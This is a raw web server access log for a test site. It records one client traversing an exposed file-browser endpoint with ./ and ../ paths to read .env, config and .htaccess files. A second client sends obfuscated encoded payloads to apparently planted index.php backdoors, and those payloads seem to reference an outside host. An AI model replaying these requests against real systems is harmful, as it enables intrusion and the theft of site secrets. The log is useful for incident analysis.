216.73.216.46 - - [21/Aug/2025:08:24:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2Fcache.php HTTP/2.0" 200 4763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "8032" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:24:25 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Fcomfunctions.php HTTP/2.0" 200 3059 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.003 "8889" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:24:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2Fcomfunctions.php HTTP/2.0" 200 3060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "8890" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:24:53 -0400] "GET /f7c78/f7c78/f7c78/f7c78/index.php?ARRAY=7o2230223n313735353738323638392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737393038392q3236346564316363613839336137376366373737613566316133336462313166222p2232223n223439306334303663663435623933333062653731613939336338346139616162222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p2262696r675s70617373223n2231372q34332q35322q36312q37322q38332q3236227q HTTP/2.0" 200 346 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 627 3.418 "1133" "3.419" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:24:56 -0400] "GET /order/files/2023-07/c9b92769-9d4a-4fe2-90ce-e5c37234ab05/_350x82_crop_center-center_none/_350x82_crop_center-center_none/index.php?ARRAY=7o2230223n313735353738323639322p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q78696164616r5s72616r645s7061746826743q313735353737393039322q3535356534303939663034653837346533396530656531366135346230633237222p2232223n226463336461343362643033393035306266373037653130333830396364643835222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2231372q33382q35342q36362q38302q38342q3134227q HTTP/2.0" 200 438 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_1_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 722 3.519 "804" "3.519" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:26:01 -0400] "GET /order/files/2023-01/2023-01/2023-01/index.php?ARRAY=7o2230223n313735353738323735392p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737393135392q3636306236343036303832366361303432353738656163653832346230643266222p2232223n226139633238663532333333386531363438346662643664643833306562323233222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p2262696r675s70617373223n2232342q34352q35352q36322q37392q38342q3139227q HTTP/2.0" 200 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0" "62.164.177.242" 633 1.835 "1216" "1.835" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:26:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Fcache.php HTTP/2.0" 200 4782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 351 0.009 "8013" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:26:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Fcache.php HTTP/2.0" 200 4780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.004 "8010" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:26:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F.%2Fcache.php HTTP/2.0" 200 4779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "7989" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:26:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fplugins HTTP/2.0" 200 1496 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.004 "10678" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:26:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2Ff7c78%2Fcache.php HTTP/2.0" 200 4778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "8006" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:27:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F.%2Findex.php HTTP/2.0" 200 3043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 351 0.009 "8617" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:27:29 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2Ff7c78%2F.. HTTP/2.0" 200 1484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "9059" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:27:32 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F.%2F.. HTTP/2.0" 200 1485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "9063" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:27:35 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2Findex.php HTTP/2.0" 200 2011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 118 0.003 "5688" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:27:38 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2F.. HTTP/2.0" 200 1508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "10261" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:28:38 -0400] "GET /f7c78/comfunctions.php?ARRAY=7o2230223n313735353738323931342p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q78696164616r5s72616r645s7061746826743q313735353737393331342q3065306663656562383965323965623365386632346163333663336362643064222p2232223n223737343938663465336439613661653564323662353837653662326331353438222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p2262696r675s70617373223n2232322q34352q35372q36332q37312q38312q3131227q HTTP/2.0" 200 414 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.4.2 Mobile/15E148 Safari/604.1" "62.164.177.242" 645 3.406 "717" "3.406" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:29:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F.%2F.. HTTP/2.0" 200 1511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 343 0.008 "10109" "0.008" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:29:13 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2Ff7c78%2Ff7c78 HTTP/2.0" 200 1565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.004 "11468" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:29:16 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F.%2Ff7c78 HTTP/2.0" 200 1565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "11472" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:29:19 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2F.htaccess HTTP/2.0" 200 1047 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "3339" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:29:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2Ff7c78%2Findex.php HTTP/2.0" 200 3044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.003 "8613" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:29:30 -0400] "GET /70f7c/70f7c/index.php?of=1 HTTP/2.0" 200 2273 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_2_3 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5" "62.164.177.242" 309 0.002 "5842" "0.002" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:29:49 -0400] "GET /cpresources/b1daeca9/js/js/index.php?ARRAY=7o2230223n313735353738323938362p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q78696164616r5s72616r645s7061746826743q313735353737393338362q6538626466663366303864643734303064623233666366363337636135373363222p2232223n223337626538386532396233636535376334316430616265316161623763383437222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p2262696r675s70617373223n2231392q34322q35392q36342q37392q38312q3235227q HTTP/2.0" 200 409 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:72.0) Gecko/20100101 Firefox/72.0" "62.164.177.242" 605 3.317 "724" "3.317" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:30:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F.%2Findex.php HTTP/2.0" 200 935 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 348 0.010 "3040" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:30:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Findex.php HTTP/2.0" 200 937 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.003 "3064" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:30:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Findex.php HTTP/2.0" 200 938 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "3061" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:30:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2F.. HTTP/2.0" 200 1513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.005 "10228" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:30:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2F.. HTTP/2.0" 200 1514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "10225" "0.004" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:30:49 -0400] "GET /1cefc/1cefc/index.php?ARRAY=7o2230223n313735353738333034372p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737393434372q3238336665636136613133323130646361663765353530313937386131623264222p2232223n226634333765386335353731626365626430616264656332616632326266363333222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2232372q35302q35372q36312q37382q39302q3134227q HTTP/2.0" 200 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" "62.164.177.242" 614 1.330 "865" "1.331" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:31:22 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2Ff7c78%2Ff7c78 HTTP/2.0" 200 1509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.008 "10255" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:31:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fcomposer.lock HTTP/2.0" 200 27663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 103 0.011 "284507" "0.012" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:31:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F.%2Ff7c78 HTTP/2.0" 200 1502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.003 "10139" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:31:30 -0400] "GET /cpresources/f8e62810/f8e62810/index.php?of=1 HTTP/2.0" 200 2204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0" "62.164.177.242" 275 0.003 "5748" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:31:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2Ff7c78%2F.htaccess HTTP/2.0" 200 1053 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "3319" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:31:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F.%2F.htaccess HTTP/2.0" 200 1058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "3323" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:32:28 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Findex.php HTTP/2.0" 200 18478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 349 0.010 "68768" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:32:31 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2Findex.php HTTP/2.0" 200 18479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.004 "68769" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:32:34 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2F.. HTTP/2.0" 200 2107 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.004 "36934" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:32:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2F.. HTTP/2.0" 200 2115 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 107 0.004 "36935" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:32:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2F..%2Ff7c78 HTTP/2.0" 200 1508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "10258" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:33:31 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2F.. HTTP/2.0" 200 1368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 332 0.017 "6519" "0.018" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:33:34 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage HTTP/2.0" 200 1606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.003 "14660" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:33:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78 HTTP/2.0" 200 1485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "9056" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:33:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2Ff7c78 HTTP/2.0" 200 1483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.004 "9057" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:33:43 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fmodules HTTP/2.0" 200 1504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.004 "9634" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:34:32 -0400] "GET /1cefc/1cefc/index.php?of=1 HTTP/2.0" 200 1917 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 266 0.006 "4855" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:34:37 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2F.env.example HTTP/2.0" 200 1202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 339 0.005 "3310" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:34:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fpublic HTTP/2.0" 200 2090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.004 "35959" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:34:43 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Findexx1.php HTTP/2.0" 200 1707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "5278" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:34:46 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2Findexx1.php HTTP/2.0" 200 1707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "5279" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:34:49 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Ftemplates HTTP/2.0" 200 1564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 100 0.003 "12721" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:34:50 -0400] "GET /3534f/3534f/3534f/index.php?ARRAY=7o2230223n313735353738333238382p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737393638382q3163363264386234666165303938613736633135653861366533343663363431222p2232223n223938356339643162633933363561326462663964633236626162323237373133222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p2262696r675s70617373223n2232372q34372q35332q36362q37312q38362q3137227q HTTP/2.0" 200 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 622 0.983 "905" "0.983" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:34:52 -0400] "GET /order/files/2023-01/2023-01/index.php?of=1 HTTP/2.0" 200 2153 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3282.140 Safari/537.36 Edge/18.17763" "62.164.177.242" 313 0.002 "5648" "0.002" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:35:47 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2F.env HTTP/2.0" 200 1307 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 333 0.007 "3435" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:35:50 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fconfig HTTP/2.0" 200 1605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 99 0.003 "13830" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:35:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fcraft HTTP/2.0" 200 1095 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.010 "3132" "0.010" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:08:35:53 -0400] "GET /3534f/3534f/3534f/3534f/3534f/index.php?ARRAY=7o2230223n313735353738333335322p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353737393735322q3262316632653466336637313064636564656262336537336633633535386261222p2232223n226364313236363239633634616336613130633433306661346334636335643535222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p2262696r675s70617373223n2232322q34372q35332q36382q37362q39302q3136227q HTTP/2.0" 200 346 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.4.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 674 0.989 "1185" "0.989" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:08:35:56 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2Ff7c78%2Ff7c78%2F. HTTP/2.0" 200 1564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "11476" "0.003" "test.newsite.space"
